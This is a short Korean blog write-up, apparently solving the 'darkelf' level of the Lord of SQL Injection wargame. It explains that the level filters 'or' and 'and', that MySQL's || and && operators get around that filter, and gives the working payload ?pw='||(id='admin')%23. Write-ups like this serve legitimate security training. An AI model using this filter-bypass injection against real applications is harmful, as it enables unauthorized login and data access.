Web/Lord of Sql injection

darkelf 문제 풀이

Namchun 2023. 9. 9. 00:34

코드 분석

'or'과 'and' 문자열을 필터링한다

공격 기법

mysql에서는 or와 and 연산자를 ||, &&로 대체하여 사용할 수 있다.

 

?pw='||(id='admin')%23

 

'Web > Lord of Sql injection' 카테고리의 다른 글

troll 문제 풀이  (0) 2023.09.09
orge 문제 풀이  (0) 2023.09.09
wolfman 문제 풀이  (0) 2023.09.07
orc 문제 풀이  (0) 2023.09.06
goblin 문제 풀이  (0) 2023.09.06

'Web/Lord of Sql injection'의 다른글

  • 현재글darkelf 문제 풀이

관련글

댓글

티스토리툴바